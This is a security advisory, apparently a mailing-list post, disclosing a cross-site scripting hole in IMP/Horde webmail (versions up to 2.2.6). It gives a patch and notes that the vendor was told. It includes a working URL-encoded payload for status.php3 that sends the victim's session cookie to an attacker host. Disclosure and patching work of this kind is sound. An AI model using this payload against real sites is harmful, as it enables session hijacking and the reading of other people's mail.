- It's possible to hijack an imp/horde session using a cross-site script     
   attack, quite  similar to the one explored by Marc Slemko in his
   "Microsoft Passport to Trouble" paper.
 
- After hijacking the cookies, the attacker can use the session and read
   the victim's mail.
 
- Imp webmail is part of the Horde Application Framework, at
   http://www.horde.org , which allows web access to an email account,
   through pop3 or imap.

- Imp is included in the Linux Madrake, Conectiva Distributions.
   It's also available in the Redhat PowerTools.

- It's used in several webmail sites, some of which
   with hundreds of thousand of users, and all of the ones tested were       
   vulnerable. Some of the administrators were warned before this advisory
   being public. Some have already been patched.
 
- All stable imp webmail versions, up to 2.2.6 including are vulnerable, the
devel version, 2.3 and 3.0 Release Candidate 1 are not affected by this
vulnerability.
 
- The horde team was warned about this and have commited a fix,
  a new version should be uploaded soon.
 
- To apply the patch use
 
http://cvs.horde.org/diff.php/imp/Attic/status.php3?r1=2.7.2.22&r2=2.7.2.23&ty=u
 
  or just escape the $message variable
  $message = htmlspecialchars($message);
  if your imp installation is already heavily customized.
 
 
- To exploit this vulnerability using a text message, the attacker sends an
   email with a url, where if the user clicks, is redirected to
 
http://myimp.site.com/status.php3?message=%3Cscript%20language%3Djavascript
%3E%20document.write(%27%3Cimg%20src%3Dhttp%3A%2F%2Fattackerhost.co
m%2Fcookie.cgi%3Fcookie%3D%27%20%2B%20escape(document.cookie)%2B%
20%27%3E%27)%3B%3C%2Fscript%3E%0A
 
which in return redirects the user's browser to the attacker's server where
he hijacks the cookies that the browser used in the context of the webmail
site, and the session therefore.
 
 
This attack is just one more example on how trusting user input is a Bad
Thing(tm), as well as the risks inherent to cross-site script attacks.
 
Please, pretty please, this was  discovered while playing around with
cookie-based session sites, after reading about the MS Wallet attack and saw
how almost 2 years after the CERT advisory on these techniques, lots of
applications are still vulnerable. There are probably lots of kids around
exploiting similar vulnerabilities. So check your web applications for
similar vulnerabilities and ask yourself how many times have you pasted
directly into the html some variable passed by the url or cookie.

 
- For more info on cross-site scripting, read CERT advisory and
   Marc Slemko's paper.
 
 
Imp Project homepage:
http://www.horde.org/imp/
 
Marc Slemko's "Microsoft Passport to Trouble":
http://alive.znep.com/~marcs/passport/
 
CERT advisory on cross-site scripting
http://www.cert.org/advisories/CA-2000-02.html

 
 
João Pedro Gonçalves
megasphibernet.org
Phibernet Information Network

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]